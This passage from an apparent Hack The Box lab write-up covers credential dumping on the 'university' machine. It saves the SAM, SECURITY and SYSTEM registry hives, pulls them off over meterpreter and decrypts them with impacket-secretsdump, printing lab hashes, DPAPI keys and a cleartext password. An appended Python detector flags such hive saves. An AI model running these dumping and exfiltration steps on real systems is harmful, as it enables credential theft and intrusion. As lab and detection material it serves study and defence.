Hashdump


Dumping the credential hashes after compromising the wc-3.university.htb host

PS C:\tmp> reg.exe save hklm\sam .\sam
 reg.exe save hklm\sam .\sam
The operation completed successfully.
 
PS C:\tmp>reg.exe save hklm\security .\security
reg.exe save hklm\security .\security
The operation completed successfully.
 
PS C:\tmp> reg.exe save hklm\system .\system
 reg.exe save hklm\system .\system
The operation completed successfully.
 
meterpreter > download C:\\tmp\\sam
[*] Downloading: C:\tmp\sam -> /home/kali/archive/htb/labs/university/sam
[*] Completed  : C:\tmp\sam -> /home/kali/archive/htb/labs/university/sam
meterpreter > download C:\\tmp\\security
[*] Downloading: C:\tmp\security -> /home/kali/archive/htb/labs/university/security
[*] Completed  : C:\tmp\security -> /home/kali/archive/htb/labs/university/security
meterpreter > download C:\\tmp\\system
[*] Downloading: C:\tmp\system -> /home/kali/archive/htb/labs/university/system
[*] Completed  : C:\tmp\system -> /home/kali/archive/htb/labs/university/system

Exfiltrating the SAM, SECURITY and SYSTEM registry hives

┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ impacket-secretsdump local -sam pe_ws-3/hashdump/sam -security pe_ws-3/hashdump/security -system pe_ws-3/hashdump/system
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Target system bootKey: 0xcafb76872642f6bc09dd9e17ae7cddec
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:71ffc7b2d302f8059b92219e7d7a7ba1:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:a8bf1bae201f988dc1ca99f1043e11dc:::
[*] Dumping cached domain logon information (domain/username:hash)
UNIVERSITY.HTB/Martin.T:$DCC2$10240#Martin.T#97cacb28b851029449213555226a7dcc: (2024-11-02 23:30:43)
UNIVERSITY.HTB/Administrator:$DCC2$10240#Administrator#d215fbd6ac39c2d0e49628006db4a2ac: (2024-10-21 23:19:28)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:b005e0d4f4724296a7513d11b36ba2e9ccd669eca34e4985f48c9f6aedadd85d0ecbe634ad06cbbba69c304449de31229f57edbcd3fdca31663bdf085685dd8120eaeded1b27d744d2a466a9ec67c03bb6b6cf28f9b36cf0b0f04431f894e72fc46ba1710beb3fd0998078d482066e613084e0d7b3f7275a4098a4c62f5e4a9553eaadbd1f2241666c7cb55622b9d13bbcd2bec24107acfc91abe33844f9b9279d5784265ffae661820d6338ff4b2b6d9b560f9bcb2de02fc2620813c9cdf7944278b479d05d1509355075fa280f93dc31fd18d6fcc61b3e77091dccb9cdb4e7cefa21596d35c38647284377d6428e7c
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:b51c7661e82feb147afffb324d91af34
[*] DefaultPassword 
(Unknown User):v3ryS0l!dP@sswd#X
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x1b8c79e73a9fe233c28cc4336b7ef8a310cf7335
dpapi_userkey:0x83c20b2c903526e92b01436284cfc32babe48018
[*] NL$KM 
 0000   A9 CF 8B DE AB C8 F3 82  92 9F 69 F3 F8 8B C2 F4   ..........i.....
 0010   E5 6D AE 0B C5 05 41 8A  B3 3C 6A 24 92 D9 F5 95   .m....A..<j$....
 0020   BB 90 A6 24 55 AE 8B 6B  7C B5 B2 40 89 52 75 66   ...$U..k|..@.Ruf
 0030   0E F1 23 17 89 D5 A2 AD  22 05 F5 D2 7F F6 DC 87   ..#.....".......
NL$KM:a9cf8bdeabc8f382929f69f3f88bc2f4e56dae0bc505418ab33c6a2492d9f595bb90a62455ae8b6b7cb5b240895275660ef1231789d5a2ad2205f5d27ff6dc87
[*] Cleaning up... 

Besides the credential hashes, there is a cleartext password: v3ryS0l!dP@sswd#X

Performing password spray
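Detection side of the reg.exe save steps above, as an added example that is not part of the original write-up: it scans process-creation command lines for saves of the credential hives and raises the severity when SYSTEM is saved together with SAM or SECURITY, since SYSTEM holds the boot key that secretsdump needs to decrypt the other two. The event fields, host names, sample records and the 10-minute window are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches reg.exe save/export of a whole credential hive, not a subkey below it.
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?"?\s+(?:save|export)\s+"?'
    r'(?:hklm|hkey_local_machine)\\(sam|security|system)(?=["\s]|$)',
    re.IGNORECASE,
)
WINDOW = timedelta(minutes=10)  # assumed correlation window, tune per environment


def find_hive_dumps(events):
    """Return one alert per host that saved a credential hive.

    Severity is "high" when SYSTEM and SAM or SECURITY were saved within
    WINDOW of each other, "medium" for any other credential hive save.
    """
    saves = defaultdict(list)  # host -> [(time, hive)]
    for ev in events:
        m = HIVE_SAVE.search(ev["cmdline"])
        if m:
            when = datetime.fromisoformat(ev["time"])
            saves[ev["host"]].append((when, m.group(1).upper()))

    alerts = []
    for host, hits in sorted(saves.items()):
        hits.sort()
        combo = False
        for t0, _ in hits:  # try every save as the start of a window
            seen = {h for t, h in hits if t0 <= t <= t0 + WINDOW}
            combo = combo or ("SYSTEM" in seen and bool(seen & {"SAM", "SECURITY"}))
        alerts.append({"host": host, "hives": sorted({h for _, h in hits}),
                       "severity": "high" if combo else "medium"})
    return alerts


# Constructed process-creation records (hypothetical hosts and field names).
SAMPLE = [
    {"host": "HOST-A", "time": "2024-01-01T10:00:01", "cmdline": r"reg.exe save hklm\sam .\sam"},
    {"host": "HOST-A", "time": "2024-01-01T10:00:09", "cmdline": r"reg.exe save hklm\security .\security"},
    {"host": "HOST-A", "time": "2024-01-01T10:00:15", "cmdline": r"reg.exe save hklm\system .\system"},
    {"host": "HOST-B", "time": "2024-01-01T11:00:00", "cmdline": r"reg export HKLM\SYSTEM\CurrentControlSet\Services\Tcpip C:\backup\tcpip.reg"},
    {"host": "HOST-C", "time": "2024-01-01T12:00:00", "cmdline": r'"C:\Windows\System32\reg.exe" save HKEY_LOCAL_MACHINE\SAM C:\Temp\s.dat'},
]
```

HOST-B is not flagged because it exports a subkey beneath SYSTEM rather than the hive itself; HOST-C is flagged at medium because a SAM copy without SYSTEM cannot be decrypted offline.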